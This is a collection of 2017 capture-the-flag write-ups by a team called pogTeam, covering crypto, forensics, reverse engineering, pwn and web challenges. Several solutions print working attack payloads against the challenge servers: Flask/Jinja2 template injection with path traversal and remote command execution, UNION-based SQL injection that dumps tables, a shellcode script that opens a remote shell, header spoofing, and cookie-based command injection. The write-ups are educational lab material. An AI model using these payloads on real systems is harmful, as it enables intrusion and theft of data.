4 | TF9QEkV6ZDCUBers1jQeQwJ5MQIaAImWgwYMdrnA3lgaaeDqnZG+0Qcb6x2SSjcC
5 | GgCZzedK7e6Hrf/daEy8R451mHC08gaS9lJVAhlmZEB1y+i/LC1L27xXycIhqKPe
6 | aoR6qVfZAhlbPhKLmhFavne/AqQbQhwaWT/rqHUL9EMtAhk5pem+TgbW3zCYF8v7
7 | j0mjJ31NC+0sLmx5
8 | -----END RSA PRIVATE KEY-----
9 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/poor_rsa.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/AlexCTF/cr4/poor_rsa.tar.gz
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/poorrsa.py:
--------------------------------------------------------------------------------
1 | from Crypto.PublicKey import RSA
2 | import gmpy
3 | import base64
4 | import binascii
5 |
6 | with open('key.pub','r') as key:
7 | pub = RSA.importKey(key.read())
8 |
9 | n = int(pub.n)
10 | e = int(pub.e)
11 |
12 | print(n)
13 | print(e)
14 |
15 | # Using factordb
16 |
17 | p = 863653476616376575308866344984576466644942572246900013156919
18 | q = 965445304326998194798282228842484732438457170595999523426901
19 |
20 | # We could also use the same algorithm we did with cr3
21 | d = int(gmpy.invert(e,(p-1)*(q-1)))
22 | print(d)
23 |
24 | pvt = RSA.construct((n, e, d, p, q))
25 |
26 | print(pvt.exportKey().decode())
27 | flag = b"Ni45iH4UnXSttNuf0Oy80+G5J7tm8sBJuDNN7qfTIdEKJow4siF2cpSbP/qIWDjSi+w="
28 | flag = base64.b64decode(flag)
29 | print(flag)
30 | flag = binascii.unhexlify(flag)
31 | print(int(flag))
32 |
33 | pt = pvt.decrypt(flag)
34 |
35 | print(pt)
36 | #print(binascii.unhexlify(pt[2:]))
37 |
38 |
--------------------------------------------------------------------------------
/2017/AlexCTF/fore1/README.MD:
--------------------------------------------------------------------------------
1 | # Fore1: Hit the core
2 |
3 | ## Description
4 |
5 | No description!
6 |
7 | ## Solution
8 |
9 | A simple strings command in the binary showed us an interesting string:
10 |
11 | ```
12 | cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
13 | ```
14 |
15 | Our team mates cyborg, mvalle and nano, found the string ALEXCTF inside the scrambled text:
16 |
17 |
18 | cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
19 |
20 | After a few minutes, cyborg got the rest of the string:
21 |
22 | cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_rwqr7fvbmHjklo3tews_hmkogooyf0vbnk0ii87Drfgh_n kiwutfb0ghk9ro987k5tfb_hjiouo087ptfcv}
23 |
24 | Flag: ALEXCTF{K33P_7H3_g00D_w0rk_up}
--------------------------------------------------------------------------------
/2017/AlexCTF/fore1/fore1.core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/AlexCTF/fore1/fore1.core
--------------------------------------------------------------------------------
/2017/AlexCTF/re4/README.md:
--------------------------------------------------------------------------------
1 | We received a .pyc file. After decompiling it we got:
2 |
3 | ~~~~
4 | # uncompyle6 version 2.9.9
5 | # Python bytecode 2.7 (62211)
6 | # Decompiled from: Python 2.7.12+ (default, Aug 4 2016, 20:04:34)
7 | # [GCC 6.1.1 20160724]
8 | # Embedded file name: unvm_me.py
9 | # Compiled at: 2016-12-20 19:44:01
10 | import md5
11 | md5s = [174282896860968005525213562254350376167L, 137092044126081477479435678296496849608L, 126300127609096051658061491018211963916L, 314989972419727999226545215739316729360L, 256525866025901597224592941642385934114L, 115141138810151571209618282728408211053L, 8705973470942652577929336993839061582L, 256697681645515528548061291580728800189L, 39818552652170274340851144295913091599L, 65313561977812018046200997898904313350L, 230909080238053318105407334248228870753L, 196125799557195268866757688147870815374L, 74874145132345503095307276614727915885L]
12 | print 'Can you turn me back to python ? ...'
13 | flag = raw_input('well as you wish.. what is the flag: ')
14 | if len(flag) > 69:
15 | print 'nice try'
16 | exit()
17 | if len(flag) % 5 != 0:
18 | print 'nice try'
19 | exit()
20 | for i in range(0, len(flag), 5):
21 | s = flag[i:i + 5]
22 | if int('0x' + md5.new(s).hexdigest(), 16) != md5s[i / 5]:
23 | print 'nice try'
24 | exit()
25 |
26 | print 'Congratz now you have the flag'
27 | # okay decompiling unvm_me.pyc
28 | ~~~~
29 |
30 | The algorithm is pretty simple. It takes the given flag, divides it in chunks of 5 chars each. Then it takes the md5 hash of each part, transform it from hex to int and compare with the corresponding hash in the md5 hashes list.
31 |
32 | We could bruteforce everything but we managed to find the hashes at hashkiller.co.uk. Well, almost all of them. The seventh chunk was not cracked.
33 |
34 | ~~~~
35 | 831daa3c843ba8b087c895f0ed305ce7 MD5 : ALEXC
36 | 6722f7a07246c6af20662b855846c2c8 MD5 : TF{dv
37 | 5f04850fec81a27ab5fc98befa4eb40c MD5 : 5d4s2
38 | ecf8dcac7503e63a6a3667c5fb94f610 MD5 : vj8nk
39 | c0fd15ae2c3931bc1e140523ae934722 MD5 : 43s8d
40 | 569f606fd6da5d612f10cfb95c0bde6d MD5 : 8l6m1
41 |
42 | c11e2cd82d1f9fbd7e4d6ee9581ff3bd MD5 : ds9v4
43 | 1df4c637d625313720f45706a48ff20f MD5 : 1n52n
44 | 3122ef3a001aaecdb8dd9d843c029e06 MD5 : v37j4
45 | adb778a0f729293e7e0b19b96a4c5a61 MD5 : 81h3d
46 | 938c747c6a051b3e163eb802a325148e MD5 : 28n4b
47 | 38543c5e820dd9403b57beff6020596d MD5 : 6v3k}
48 | ~~~~
49 |
50 | So we crafted this silly script to bruteforce the missing part:
51 |
52 | ~~~~
53 | import itertools
54 | import string
55 | import md5
56 |
57 | alphabets = '0' + string.ascii_lowercase + '123456789'
58 |
59 | for s in itertools.product(alphabets, repeat = 5):
60 | s = ''.join(s)
61 | print s
62 | r = str(int('0x' + md5.new(s).hexdigest(), 16))
63 | print r
64 |
65 | if '8705973470942652577929336993839061582' in r:
66 | print s
67 | print 'OK'
68 | break
69 | ~~~~
70 |
71 | And there it was. *n5l67* was all we needed.
72 |
73 | ALEXCTF{dv5d4s2vj8nk43s8d8l6m1n5l67ds9v41n52nv37j481h3d28n4b6v3k} o/
74 |
--------------------------------------------------------------------------------
/2017/AlexCTF/re4/re4.py:
--------------------------------------------------------------------------------
1 | import itertools
2 | import string
3 | import md5
4 |
5 | alphabets = '0' + string.ascii_lowercase + '123456789'
6 |
7 | for s in itertools.product(alphabets, repeat = 5):
8 | s = ''.join(s)
9 | print s
10 | r = str(int('0x' + md5.new(s).hexdigest(), 16))
11 | print r
12 |
13 | if '8705973470942652577929336993839061582' in r:
14 | print s
15 | print 'OK'
16 | break
17 |
18 |
--------------------------------------------------------------------------------
/2017/BSides/Ancient Hop Grain Juice/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - Ancient Hop Grain Juice
2 |
3 | ## Description
4 |
5 | This beverage, brewed since ancient times, is made from hops and grains?
6 |
7 | ## Solution
8 |
9 | beer
10 |
--------------------------------------------------------------------------------
/2017/BSides/Forensics-easycap/README.MD:
--------------------------------------------------------------------------------
1 | # Forensics - Easycap
2 |
3 | ## Description
4 |
5 | Can you get the flag from the packet capture?
6 |
7 | ## Solution
8 |
9 | The challange has a PCAP File. I just open it in Wireshark and, with right mouse button, choose Follow TCP Stream. The flag was there.
10 | # FLAG:385b87afc8671dee07550290d16a8071
11 |
--------------------------------------------------------------------------------
/2017/BSides/Forensics-easycap/easycap.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BSides/Forensics-easycap/easycap.pcap
--------------------------------------------------------------------------------
/2017/BSides/MISC-Let-s play a game/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - Let's play a game
2 |
3 | ## Description
4 |
5 | This is the name of the game that a young hacker thinks he's playing with the WOPR Supercomputer. [Spaces expected]
6 |
7 | ## Solution
8 |
9 | According Wikipedia (https://en.wikipedia.org/wiki/WarGames), the answer is
10 | # Global Thermonuclear War
11 |
--------------------------------------------------------------------------------
/2017/BSides/MISC-Quote/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - Quote
2 |
3 | ## Description
4 |
5 | This movie featured the memorable phrase "My voice is my passport".
6 |
7 | ## Solution
8 |
9 | Google: "My voice is my passport"
10 | # Sneakers
11 |
--------------------------------------------------------------------------------
/2017/BSides/MISC-The Right Cipher/README.MD:
--------------------------------------------------------------------------------
1 | # MISC - The Right Cipher
2 |
3 | ## Description
4 |
5 | This cipher was correctly used in TKIP
6 |
7 | ## Solution
8 |
9 | According Wikipedia (https://pt.wikipedia.org/wiki/TKIP), the answer is
10 | # RC4
11 |
--------------------------------------------------------------------------------
/2017/BSides/NOP/README.MD:
--------------------------------------------------------------------------------
1 | # NOP
2 |
3 | ## Description
4 |
5 | x86's NOP is actually another instruction. What is the Intel syntax representation of the assembly of the other Instruction?
6 | Include a space between operands, if applicable.
7 |
8 | ## Solution
9 |
10 | According Wikipedia (https://en.wikipedia.org/wiki/NOP), the answer is:
11 |
12 | # xchg eax, eax
13 |
--------------------------------------------------------------------------------
/2017/BSides/Zumbo/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BSides/Zumbo/1.png
--------------------------------------------------------------------------------
/2017/BSides/Zumbo/README.MD:
--------------------------------------------------------------------------------
1 | # Zumbo 1/2/3
2 |
3 | ## Description
4 |
5 | Welcome to ZUMBOCOM....you can do anything at ZUMBOCOM.
6 |
7 | Three flags await. Can you find them?
8 |
9 | http://zumbo-8ac445b1.ctf.bsidessf.net
10 |
11 |
12 | ## Solution
13 |
14 | First of all: I spent about 2 hours to get all the three flags, the third one was nice because I've never exploited something like that, really liked this challenge!
15 | Well, let's write the things!
16 |
17 |
18 | ### Zumbo1
19 |
20 | The first part of the challenge was easy, at the bottom of the source code there was this:
21 |
22 | ```html
23 |
24 | ```
25 |
26 | My first thought was that could be a flask exploitation, and for my lucky, I was right! My first thought was that could be a flask exploitation, and for my lucky, I was right! I've already read a nice article about flask vulnerabilities [here](https://nvisium.com/blog/2015/12/07/injecting-flask/), but never needed to use it.
27 |
28 | Confirming the vulnerability:
29 |
30 | ```
31 | http://zumbo-8ac445b1.ctf.bsidessf.net/{{ 333+333 }}
32 | ```
33 | This returns 666 which, means the server got our request, and now we can get more information, for example, the application's source code.
34 |
35 | In this case, we had to encode the '/': http://zumbo-8ac445b1.ctf.bsidessf.net//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fcode/server.py
36 |
37 | ```python
38 | import flask, sys, os
39 | import requests
40 |
41 | app = flask.Flask(__name__)
42 | counter = 12345672
43 |
44 | @app.route('/')
45 | def custom_page(page):
46 | if page == 'favicon.ico':
47 | return ''
48 |
49 | global counter
50 | counter += 1
51 |
52 | try:
53 | template = open(page).read()
54 | except Exception as e:
55 | template = str(e) template += "\n\n" % (page, __file__)
56 | return flask.render_template_string(template, name='test', counter=counter);
57 |
58 |
59 | @app.route('/') def home():
60 | return flask.redirect('/index.template');
61 | if __name__ == '__main__':
62 | flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'
63 |
64 | with open('/flag') as f:
65 | flag2 = f.read()
66 |
67 | flag3 = requests.get('http://vault:8080/flag').text print "Ready set go!"
68 | sys.stdout.flush()
69 |
70 | app.run(host="0.0.0.0")
71 | ```
72 |
73 | Zumbo1 flag: FIRST_FLAG_WASNT_HARD
74 |
75 |
76 | ### Zumbo2
77 |
78 | The second part of the challenge, was easy too. We just had to read the file called flag:
79 |
80 | ```
81 | http://zumbo-8ac445b1.ctf.bsidessf.net//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fflag
82 | ```
83 |
84 | Zumbo2 flag: RUNNER_ON_SECOND_BASE
85 |
86 |
87 | ### Zumbo3
88 |
89 | Now the cool part \o
90 |
91 | As you can see above there's a local variable called flag3, I spent a long time trying to read this value. I was able to read the global counter, but not this one.
92 |
93 | So, I started to think to make a request by myself and get the value instead of read the value of flag3. *(If someone knows how to do that, please tell me).*
94 |
95 | In the same blog, there is another article where the author goes deeper in flask vulnerablity: https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
96 |
97 | Following these steps, I was able to execute commands in the server, but how can I get the flag? At this time, I was receiveng Internal Server Error from time in time, so I decided to kinda of bruteforce a request with curl to get the flag:
98 |
99 | ```python
100 | import requests
101 |
102 | while True:
103 | r = requests.get("http://zumbo-8ac445b1.ctf.bsidessf.net/{{ config['RUNCMD']('/usr/bin/curl http://vault:8080/flag',shell=True)%20%7D%7D")
104 | if r.status_code == 200:
105 | print(r.text)
106 | exit()
107 | ```
108 |
109 | 
110 |
111 | Zumbo3 flag: BRICK_HOUSE_BEATS_THE_WOLF
--------------------------------------------------------------------------------
/2017/BSides/easyshell/README.md:
--------------------------------------------------------------------------------
1 | As the name of the chall says, we need a shell. And it should be easy to get.
2 |
3 | Instead of trying to figure out exactly what the C code implements, we chose to craft a simple shellcode for getting the shell.
4 |
5 | Pwntools is a wonderful tool for PWN, as expected. It can solve multiple kinds of CTF problems, including shellcode generation.
6 |
7 | ~~~~
8 | from pwn import *
9 | context(arch = 'i386', os = 'linux')
10 |
11 | r = remote('easyshell-f7113918.ctf.bsidessf.net', 5252)
12 | r.send(asm(shellcraft.sh()))
13 | r.interactive()
14 | ~~~~
15 |
16 | After getting the shell, just read the flag:
17 |
18 | ~~~~
19 | $ python easyshell.py
20 | [+] Opening connection to easyshell-f7113918.ctf.bsidessf.net on port 5252: Done
21 | [\*] Switching to interactive mode
22 | Send me stuff!!
23 | $ cat /home/ctf/flag.txt
24 | FLAG:c832b461f8772b49f45e6c3906645adb
25 | ~~~~
26 |
27 |
--------------------------------------------------------------------------------
/2017/BitsCTF/Batman vs Joker/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Batman vs Joker/1.png
--------------------------------------------------------------------------------
/2017/BitsCTF/Batman vs Joker/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Batman vs Joker/2.png
--------------------------------------------------------------------------------
/2017/BitsCTF/Batman vs Joker/README.MD:
--------------------------------------------------------------------------------
1 | # Batman vs Joker
2 |
3 | ## Description
4 |
5 | Joker has left a message for you. Your job is to get to the message asap.
6 |
7 | joking.bitsctf.bits-quark.org
8 |
9 | ## Solution
10 |
11 | First of all, in this challenge I used two firefox useful complements: Firebug and Hackbar :) (I really like these complements).
12 |
13 | I initiated the challenge analysis guessing the required ID at the index, and obviously, the value 1 was found.
14 |
15 | 
16 |
17 | With the firebug, I was able to get the full request and its parameters. Following the context, I had an idea that the challenge was related with SQL Injection, so, I confirmed the vulnerability forcing some error in the page with an incorrect parameter value. The result:
18 |
19 | ```
20 | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' Limit 1' at line 1
21 | ```
22 |
23 | The next step is try to get more information about the challenge database, the payload which has worked, had this structure: *1' injection #*.
24 |
25 | An important information about SQL Injection is always try to know about the database version, for example, in this case I was able to use [information_schema](https://dev.mysql.com/doc/refman/5.7/en/information-schema.html) because we were exploiting a 5 > mysql version environment.
26 |
27 | 
28 |
29 | In the following commands, I used information_schema to get the tables from current database, the columns and dump the data.
30 |
31 | Tables:
32 | ```php
33 | id=1' union select 1,table_name from information_schema.tables where table_schema=database() #&submit1=submit
34 |
35 | First name:1
36 | Surname: CIA_Official_Records
37 |
38 | First name:1
39 | Surname: Joker
40 |
41 | ```
42 |
43 | Columns:
44 | ```php
45 | id=1' union select 1,column_name from information_schema.columns where table_name='Joker' #&submit1=submit
46 |
47 | First name:1
48 | Surname: Flag
49 |
50 | First name:1
51 | Surname: HaHaHa
52 | ```
53 |
54 | Dumping the data:
55 | ```php
56 | id=1' union select 1,concat_ws(':',Flag,HaHaHa) from Joker #&submit1=submit
57 |
58 | First name:1
59 | Surname: BITSCTF{wh4t_d03snt_k1ll_y0u_s1mply_m4k3s_y0u_str4ng3r!}:Enjoying the game Batman!!!
60 | ```
61 |
62 | Flag: BITSCTF{wh4t_d03snt_k1ll_y0u_s1mply_m4k3s_y0u_str4ng3r!}
--------------------------------------------------------------------------------
/2017/BitsCTF/BotBot/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/BotBot/1.png
--------------------------------------------------------------------------------
/2017/BitsCTF/BotBot/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/BotBot/2.png
--------------------------------------------------------------------------------
/2017/BitsCTF/BotBot/README.MD:
--------------------------------------------------------------------------------
1 | # BotBot
2 |
3 | ## Description
4 |
5 | Should not ask for the description of a 5 marker.
6 | botbot.bitsctf.bits-quark.org
7 |
8 | ## Solution
9 |
10 | Accessing the given website, there wasn't anything interesting at source code besides an information about the SEO (Search Engine Optimization).
11 | SEO is a group of techniques to optimize the search results related about your website.
12 |
13 | 
14 |
15 | One of these techniques is the robots.txt configuration. So, following this path, we found something:
16 |
17 | 
18 |
19 | In this directory, we got the flag: BITCTF{take_a_look_at_googles_robots_txt}
--------------------------------------------------------------------------------
/2017/BitsCTF/Labour/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Labour/README.MD
--------------------------------------------------------------------------------
/2017/BitsCTF/README.MD:
--------------------------------------------------------------------------------
1 | BitsCTF writeups
2 |
--------------------------------------------------------------------------------
/2017/BitsCTF/Sherlock/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BitsCTF/Sherlock/1.png
--------------------------------------------------------------------------------
/2017/BitsCTF/Sherlock/README.MD:
--------------------------------------------------------------------------------
1 | # Sherlock
2 |
3 | ## Description
4 |
5 | Sherlock has a mystery in front of him. Help him to find the flag.
6 |
7 | ## Solution
8 |
9 | The given file is a plain text file, without any special information. It's just a text from the adventures of the great Sherlock Holmes.
10 | We found something interesting while we're working on this challenge, there was some capital letters.
11 | Our team mate @cyborg found this and we started to work on it.
12 |
13 | 
14 |
15 | These groups of capital letters are clearly the words 'ZERO' and 'ONE'.
16 | From this approach, we assumed we had to convert this binary information to something readable.
17 |
18 | With a simple python script, we got the flag:
19 |
20 | ```python
21 | import re
22 | import binascii
23 |
24 | word = open('final.txt').read()
25 | r = re.findall('([A-Z])', word)
26 | print binascii.unhexlify('%x' % (int(''.join(r).replace('ZERO','0').replace('ONE','1'),2)))
27 | ```
28 |
29 | Which gave us the flag: BITSCTF{h1d3_1n_pl41n_5173}
--------------------------------------------------------------------------------
/2017/BitsCTF/Sherlock/solve.py:
--------------------------------------------------------------------------------
1 | import re
2 | import binascii
3 |
4 | word = open('final.txt').read()
5 | r = re.findall('([A-Z])', word)
6 | print binascii.unhexlify('%x' % (int(''.join(r).replace('ZERO','0').replace('ONE','1'),2)))
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BreakIn/A present for her Birthday!/1.png
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BreakIn/A present for her Birthday!/2.png
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/BreakIn/A present for her Birthday!/3.png
--------------------------------------------------------------------------------
/2017/BreakIn/A present for her Birthday!/README.MD:
--------------------------------------------------------------------------------
1 | # A present for her Birthday!
2 |
3 | ## Description
4 |
5 | Yesterday was Animesh's best friend's (at least he thinks so) birthday. Animesh had bought a nice present for her, but she didn't even invite Animesh :-( . He came to know that only the people who have the secret key for the birthday party can get the invitation the party. Unfortunately Animesh does not have that key, but he know that the key can be found [here](https://felicity.iiit.ac.in/contest/extra/birthday). Can you help Animesh find the key so that he can attend her birthday party and give her the sweetest present he bought for her.
6 |
7 | ## Solution
8 |
9 | The link redirect us to a simple website with no links, inputs or anything else. There was just a message:
10 |
11 | 
12 |
13 | With no information in the source code, I started looking at the cookies, where I found something interesting:
14 |
15 | 
16 |
17 | The cookie birthday_invite has the value *68934a3e9455fa72420237eb05902327* which is the md5 hash for "false".
18 |
19 | Following a simple logic, I changed its value for *b326b5062b2f0e69046810717534cb09* which is the md5 hash for "true" and here's the result:
20 |
21 | 
22 |
23 | Flag: the_flag_is_6bdfde3455a864cde19362cc01da125f
--------------------------------------------------------------------------------
/2017/BreakIn/A weird C program/README.md:
--------------------------------------------------------------------------------
1 | We were given a C (C++ in fact) code and that was all. Of course, my first idea was to start reading that cryptic code, deciphering its loops and so on.
2 |
3 | Sometime during the contest the admin posted this hint:
4 |
5 | HINT: It's much more than just a C program
6 |
7 | So, could it be something other than a C program? Let's see. The first thing that caught my C-eyes was that identation... sends shivers down the spine. Now wait a minute! Look at the whitespaces. It reminds me that esolang, *Whitespace*!
8 |
9 | And that was it indeed. The code was in the whitespaces, not the proper characters themselves. Using this interpreter http://ws2js.luilak.net/interpreter.html we got the flag.
10 |
11 | the_flag_is_WpUAItsadmhak
12 |
--------------------------------------------------------------------------------
/2017/BreakIn/A weird C program/program.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | /*int main( int argc, char **argv )
6 | {*/
7 | #define EEr_Rs 0x4b
8 | #include
9 | #include
10 | #include
11 | #define LINE_new '\n'
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 |
19 | int main(){ int run;
20 | run>>=5;run=0;
21 | run&=01; int FELICITY[10000];
22 | run>>=5;
23 | using namespace std;
24 |
25 |
26 |
27 | char *res[6] = {"Nothing_" ,
28 |
29 | " and _no _one _is _perfect. ",
30 |
31 | "It_ just _takes_ a_good _eye_",
32 |
33 | "to_find_" ,
34 |
35 | "those_ hidden_" ,
36 |
37 | "imperfections. :)" };
38 |
39 | int i = 0,j=0;
40 |
41 | for( i=0;i < 6 ; i++)for(j=0;jMmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM= which decoded is a md5 hash 2b4b037fd1f30375e5cd871448b5b95c.
13 |
14 | 
15 |
16 | After get these values, I tried to curl the flag but I was getting an error message.
17 | I saw a hint in the Nullcon twitter: 'There's no place like home' and a friend that I made in the contest (thanks [@menztrual](https://twitter.com/menztrual) from TheGoonies ;)) cleared my mind:
18 |
19 | curl -v --header "X-Forwarded-For: 127.0.0.1" --data "user=coldplay&pass=paradise" -X POST "http://54.152.19.210/web100/"
20 |
21 | The header X-Forwarded-For was the catch!
22 |
23 | Flag: flag{4f9361b0302d4c2f2eb1fc308587dfd6}
--------------------------------------------------------------------------------
/2017/HackIM/Web/2/README.MD:
--------------------------------------------------------------------------------
1 | # Web2
2 |
3 | ## Description
4 |
5 | There are two kinds of people in this world. One with all the privileges and the others. Can you get the flag by eating some British biscuit?
6 |
7 |
8 | ## Solution
9 |
10 | As the same in Web1: Once I took to long to write this, the environment for Nullcon HackIM is not available anymore, so I'll just put the things I remember :D
11 |
12 | The site requires a user and password, and it gives us an interface to register it by ourselves.
13 | In the challenge description the admin mentioned something about cookies, so, here's the logic behind it.
14 | By the time you log in to the system, it creates two cookies, r and u and there was a constant part in both 351e766803.
15 |
16 | ```php
17 | User: pog - Password: pog
18 |
19 | cookie: r = 351e766803 + d63c7ede8cb1e1c8db5e51c63fd47cff (limited)
20 | cookie: u = 351e766803 + 5bb50314c7d970ce6cb07afb583c4c9d (pog)
21 | ```
22 |
23 | Removing this, the other part is a md5 hash from the user access and the username, respectively. So, following this approach, I tried to generate a md5 hash for unlimited, administrator and the ones which worked, was admin! :D
24 |
25 | Flag: flag{1e39bd297a47ed0eeaea9cac7e}
--------------------------------------------------------------------------------
/2017/README.md:
--------------------------------------------------------------------------------
1 | # Writeups 2017
2 |
3 | @pogTeam's writeups collections.
4 |
5 |
--------------------------------------------------------------------------------
/2017/TUCTF/cookieHarrelson/README.md:
--------------------------------------------------------------------------------
1 | # Cookie Harrelson (200pts)
2 |
3 | ## Description
4 |
5 | ~~~
6 | Woody Harrelson has decided to take up web dev after learning about Cookies. Show him that he should go back to killing zombies.
7 |
8 | Note: index.txt is what is being displayed on the page.
9 |
10 | http://cookieharrelson.tuctf.com
11 | ~~~
12 |
13 | ## Solution
14 |
15 | We start by looking at the cookies with CookieMonster extension. In the cookie `tallahassee` there is a URL encoded, base64 encoded text:
16 |
17 | cat index.txt
18 |
19 | We first tried editing this cookie to `cat flag` or `cat flag.txt`. After refreshing the page, we checked the cookie and found:
20 |
21 | cat index.txt #cat flag
22 |
23 | So our command is probably being commented in a Shell Script way. After a lot of thinking and some friends helping, we found the solution with multi line commands:
24 |
25 | \
26 | cat flag
27 |
28 | After refreshing:
29 |
30 | cat index #\
31 | cat flag
32 |
33 | The flag shows up in the page:
34 |
35 | TUCTF{D0nt_3x3cut3_Fr0m_c00k13s}
36 |
37 | Again, don't!
38 |
--------------------------------------------------------------------------------
/2017/TUCTF/gitGud/README.md:
--------------------------------------------------------------------------------
1 | # Git Gud (100pts)
2 |
3 | ## Description
4 |
5 | Jimmy has begun learning about Version Control Systems and decided it was a good time to put it into use for his person website. Show him how to Git Gud.
6 |
7 | http://gitgud.tuctf.com
8 |
9 | ## Solution
10 |
11 | The challenge gives a URL with apparently nothing useful. Due to the tile we thought about a git repo somewhere in this domain. We found it manually at:
12 |
13 | http://http://gitgud.tuctf.com/.git
14 |
15 | The biggest difficulty was to download the repo, sice `git clone` did not work. So we downloaded it recursively with:
16 |
17 | $ wget -r http://gitgud.tuctf.com/.git
18 |
19 | In the `.git/log` folder we could see that the flag was added with commit `4fa0acbccd0885dace2f111f2bd7a120abc0fb4e`:
20 |
21 | However, before checking out into this commit, we needed to stash the changes:
22 |
23 | $ git stash
24 |
25 | Now we were able to:
26 |
27 | $ git checkout 4fa0acbccd0885dace2f111f2bd7a120abc0fb4
28 | HEAD is now at 4fa0acb... Added flag
29 |
30 | Finally:
31 |
32 | ~~~
33 | $ git show
34 | commit 4fa0acbccd0885dace2f111f2bd7a120abc0fb4e
35 | Author: Jimmy
36 | Date: Tue Nov 21 20:47:00 2017 +0000
37 |
38 | Added flag
39 |
40 | diff --git a/flag b/flag
41 | new file mode 100644
42 | index 0000000..1b8dce4
43 | --- /dev/null
44 | +++ b/flag
45 | @@ -0,0 +1,2 @@
46 | +
47 | +TUCTF{D0nt_M4k3_G1t_Publ1c}
48 | ~~~
49 |
50 | So, yeah, just don't do it :)
51 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/README.md:
--------------------------------------------------------------------------------
1 | # SQL injection challs by @corb3nik.
2 | ## Writeups by @pogTeam.
3 |
4 | Original URL
5 |
6 | http://159.203.173.168:12000/
7 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level1/README.md:
--------------------------------------------------------------------------------
1 | My friend created a website where we can store secrets... Unfortunately, we can only see our own. Help me find all of my friend's secrets.
2 |
3 | 
4 |
5 | Really simple stuff. Just a place to insert a 'secret' and another to retrieve it.
6 |
7 | Just a mainstream
8 |
9 | ' or 1=1 --
10 |
11 | instead of the session ID should do it.
12 |
13 | ## Why it works
14 |
15 | The nice thing about these challs is they all give you the source codes. This could spoil a real CTF chall but it is great for learning purposes.
16 |
17 | The vulnerability we exploited is in this snippet below.
18 |
19 | ~~~~
20 |
21 | if (isset($\_POST['session_id'])) {
22 | $query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
23 | $result = $conn->query($query);
24 | }
25 | ~~~~
26 |
27 | Yep, no input sanitization. Our 'session_id' field is directly inserted into the query, allowing us to pass some malicious code. In this case we build a new query to bypass the login:
28 |
29 | "SELECT * FROM secrets WHERE session_id = '" ."' or 1=1 -- " . "'";
30 |
31 | Note that we needed to append "*-- *" to our parameter. The *--* is necessary to comment the rest of the query, so it makes sense. Nevertheless, we also needed to append a blank space to it so MySQL understands the query.
32 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level1/level1.php:
--------------------------------------------------------------------------------
1 |
2 |
16 | <?php
if (isset($_GET['source'])) {
die(highlight_file(__FILE__));
}
require("conf/level1.conf.php");
error_reporting(0);
session_start();
if (isset($_POST['secret'])) {
$query = $conn->prepare("INSERT INTO secrets(session_id, secret) VALUES (?, ?)");
$current_session_id = session_id();
$query->bind_param('ss', $current_session_id, $_POST['secret']);
$query->execute();
}
if (isset($_POST['session_id'])) {
$query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
